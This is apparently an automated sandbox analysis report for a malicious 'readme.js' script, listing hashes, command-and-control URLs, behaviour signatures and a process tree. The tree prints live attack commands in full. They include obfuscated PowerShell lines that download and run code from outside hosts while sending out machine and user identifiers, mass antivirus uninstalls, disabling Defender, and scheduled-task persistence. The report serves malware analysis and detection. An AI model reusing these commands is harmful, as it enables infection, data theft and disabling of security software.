Analysis
-
max time kernel
57s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-02-2021 18:36
Static task
static1
Behavioral task
behavioral1
Sample
readme.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
readme.js
Resource
win10v20201028
General
-
Target
readme.js
-
Size
9KB
-
MD5
e294d6f427c64f77b5b61bb7b17dd12c
-
SHA1
ccdae3ada854cc441106ec52c12823439bab6cba
-
SHA256
9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
-
SHA512
2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a
Malware Config
Extracted
http://t.zz3r0.com
Extracted
http://t.zer9g.com
Extracted
http://t.bb3u9.com
Extracted
http://t.bb3u9.com
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEflow pid process 8 1540 powershell.exe 32 5072 powershell.EXE 34 4976 powershell.EXE 36 4976 powershell.EXE -
Executes dropped EXE 3 IoCs
Processes:
ye9zMSruN.exeye9zMSruN.exeye9zMSruN.exepid process 4732 ye9zMSruN.exe 4844 ye9zMSruN.exe 5016 ye9zMSruN.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.EXE File created C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe powershell.EXE File opened for modification C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe powershell.EXE -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4932 4360 WerFault.exe powershell.EXE 2748 4976 WerFault.exe powershell.EXE -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4136 schtasks.exe 4820 schtasks.exe 4620 schtasks.exe 3780 schtasks.exe 2156 schtasks.exe 3364 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEye9zMSruN.exeye9zMSruN.exepowershell.EXEye9zMSruN.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ye9zMSruN.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs ye9zMSruN.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates ye9zMSruN.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs ye9zMSruN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1512 notepad.exe -
Suspicious behavior: EnumeratesProcesses 63 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEWerFault.exepowershell.EXEpowershell.EXEWerFault.exeye9zMSruN.exeye9zMSruN.exeye9zMSruN.exepid process 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 3116 powershell.exe 3116 powershell.exe 3116 powershell.exe 4360 powershell.EXE 4360 powershell.EXE 4360 powershell.EXE 4360 powershell.EXE 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 4932 WerFault.exe 5072 powershell.EXE 5072 powershell.EXE 5072 powershell.EXE 5072 powershell.EXE 4976 powershell.EXE 4976 powershell.EXE 4976 powershell.EXE 4976 powershell.EXE 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 4732 ye9zMSruN.exe 4732 ye9zMSruN.exe 4732 ye9zMSruN.exe 4844 ye9zMSruN.exe 4844 ye9zMSruN.exe 5016 ye9zMSruN.exe 5016 ye9zMSruN.exe 4732 ye9zMSruN.exe 4844 ye9zMSruN.exe 5016 ye9zMSruN.exe 4844 ye9zMSruN.exe 5016 ye9zMSruN.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1540 powershell.exe Token: SeIncreaseQuotaPrivilege 1540 powershell.exe Token: SeSecurityPrivilege 1540 powershell.exe Token: SeTakeOwnershipPrivilege 1540 powershell.exe Token: SeLoadDriverPrivilege 1540 powershell.exe Token: SeSystemProfilePrivilege 1540 powershell.exe Token: SeSystemtimePrivilege 1540 powershell.exe Token: SeProfSingleProcessPrivilege 1540 powershell.exe Token: SeIncBasePriorityPrivilege 1540 powershell.exe Token: SeCreatePagefilePrivilege 1540 powershell.exe Token: SeBackupPrivilege 1540 powershell.exe Token: SeRestorePrivilege 1540 powershell.exe Token: SeShutdownPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeSystemEnvironmentPrivilege 1540 powershell.exe Token: SeRemoteShutdownPrivilege 1540 powershell.exe Token: SeUndockPrivilege 1540 powershell.exe Token: SeManageVolumePrivilege 1540 powershell.exe Token: 33 1540 powershell.exe Token: 34 1540 powershell.exe Token: 35 1540 powershell.exe Token: 36 1540 powershell.exe Token: SeIncreaseQuotaPrivilege 1540 powershell.exe Token: SeSecurityPrivilege 1540 powershell.exe Token: SeTakeOwnershipPrivilege 1540 powershell.exe Token: SeLoadDriverPrivilege 1540 powershell.exe Token: SeSystemProfilePrivilege 1540 powershell.exe Token: SeSystemtimePrivilege 1540 powershell.exe Token: SeProfSingleProcessPrivilege 1540 powershell.exe Token: SeIncBasePriorityPrivilege 1540 powershell.exe Token: SeCreatePagefilePrivilege 1540 powershell.exe Token: SeBackupPrivilege 1540 powershell.exe Token: SeRestorePrivilege 1540 powershell.exe Token: SeShutdownPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeSystemEnvironmentPrivilege 1540 powershell.exe Token: SeRemoteShutdownPrivilege 1540 powershell.exe Token: SeUndockPrivilege 1540 powershell.exe Token: SeManageVolumePrivilege 1540 powershell.exe Token: 33 1540 powershell.exe Token: 34 1540 powershell.exe Token: 35 1540 powershell.exe Token: 36 1540 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeIncreaseQuotaPrivilege 3768 WMIC.exe Token: SeSecurityPrivilege 3768 WMIC.exe Token: SeTakeOwnershipPrivilege 3768 WMIC.exe Token: SeLoadDriverPrivilege 3768 WMIC.exe Token: SeSystemProfilePrivilege 3768 WMIC.exe Token: SeSystemtimePrivilege 3768 WMIC.exe Token: SeProfSingleProcessPrivilege 3768 WMIC.exe Token: SeIncBasePriorityPrivilege 3768 WMIC.exe Token: SeCreatePagefilePrivilege 3768 WMIC.exe Token: SeBackupPrivilege 3768 WMIC.exe Token: SeRestorePrivilege 3768 WMIC.exe Token: SeShutdownPrivilege 3768 WMIC.exe Token: SeDebugPrivilege 3768 WMIC.exe Token: SeSystemEnvironmentPrivilege 3768 WMIC.exe Token: SeRemoteShutdownPrivilege 3768 WMIC.exe Token: SeUndockPrivilege 3768 WMIC.exe Token: SeManageVolumePrivilege 3768 WMIC.exe Token: 33 3768 WMIC.exe Token: 34 3768 WMIC.exe Token: 35 3768 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.execmd.exepowershell.execmd.exeschtasks.execmd.execmd.execmd.execmd.execmd.exepowershell.EXEcmd.exedescription pid process target process PID 3920 wrote to memory of 856 3920 wscript.exe cmd.exe PID 3920 wrote to memory of 856 3920 wscript.exe cmd.exe PID 856 wrote to memory of 1512 856 cmd.exe notepad.exe PID 856 wrote to memory of 1512 856 cmd.exe notepad.exe PID 856 wrote to memory of 1540 856 cmd.exe powershell.exe PID 856 wrote to memory of 1540 856 cmd.exe powershell.exe PID 1540 wrote to memory of 200 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 200 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 3116 1540 powershell.exe powershell.exe PID 1540 wrote to memory of 3116 1540 powershell.exe powershell.exe PID 1540 wrote to memory of 2964 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 2964 1540 powershell.exe cmd.exe PID 2964 wrote to memory of 3200 2964 cmd.exe WMIC.exe PID 2964 wrote to memory of 3200 2964 cmd.exe WMIC.exe PID 1540 wrote to memory of 3364 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 3364 1540 powershell.exe schtasks.exe PID 3364 wrote to memory of 3768 3364 schtasks.exe WMIC.exe PID 3364 wrote to memory of 3768 3364 schtasks.exe WMIC.exe PID 1540 wrote to memory of 2112 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 2112 1540 powershell.exe cmd.exe PID 2112 wrote to memory of 1264 2112 cmd.exe WMIC.exe PID 2112 wrote to memory of 1264 2112 cmd.exe WMIC.exe PID 1540 wrote to memory of 68 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 68 1540 powershell.exe cmd.exe PID 68 wrote to memory of 2696 68 cmd.exe cmd.exe PID 68 wrote to memory of 2696 68 cmd.exe cmd.exe PID 1540 wrote to memory of 3484 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 3484 1540 powershell.exe cmd.exe PID 3484 wrote to memory of 4056 3484 cmd.exe WMIC.exe PID 3484 wrote to memory of 4056 3484 cmd.exe WMIC.exe PID 1540 wrote to memory of 3444 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 3444 1540 powershell.exe cmd.exe PID 3444 wrote to memory of 3700 3444 cmd.exe WMIC.exe PID 3444 wrote to memory of 3700 3444 cmd.exe WMIC.exe PID 1540 wrote to memory of 2132 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 2132 1540 powershell.exe cmd.exe PID 2132 wrote to memory of 2200 2132 cmd.exe WMIC.exe PID 2132 wrote to memory of 2200 2132 cmd.exe WMIC.exe PID 1540 wrote to memory of 2988 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 2988 1540 powershell.exe cmd.exe PID 1540 wrote to memory of 3364 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 3364 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4136 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4136 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4340 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4340 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4820 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4820 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 5052 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 5052 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4620 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4620 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4956 1540 powershell.exe schtasks.exe PID 1540 wrote to memory of 4956 1540 powershell.exe schtasks.exe PID 5072 wrote to memory of 4560 5072 powershell.EXE cmd.exe PID 5072 wrote to memory of 4560 5072 powershell.EXE cmd.exe PID 5072 wrote to memory of 4608 5072 powershell.EXE cmd.exe PID 5072 wrote to memory of 4608 5072 powershell.EXE cmd.exe PID 5072 wrote to memory of 4632 5072 powershell.EXE cmd.exe PID 5072 wrote to memory of 4632 5072 powershell.EXE cmd.exe PID 4560 wrote to memory of 4728 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 4728 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 4732 4560 cmd.exe ye9zMSruN.exe PID 4560 wrote to memory of 4732 4560 cmd.exe ye9zMSruN.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball4⤵
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \zE1gPp /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \zE1gPp4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn ycgz21vl\vn2exu8wFSI /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn ycgz21vl\vn2exu8wFSI4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd4⤵
-
C:\Windows\system32\netsh.exenetsh.exe firewall add portopening tcp 65529 SDNSd5⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=534⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F4⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4360 -s 24842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&MKLUFVRL^^^&00000000-0000-0000-0000-000000000000^^^&F6:48:E9:E4:AC:23');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|ye9zMSruN.exe -2⤵
- Suspicious use of WriteProcessMemory
-
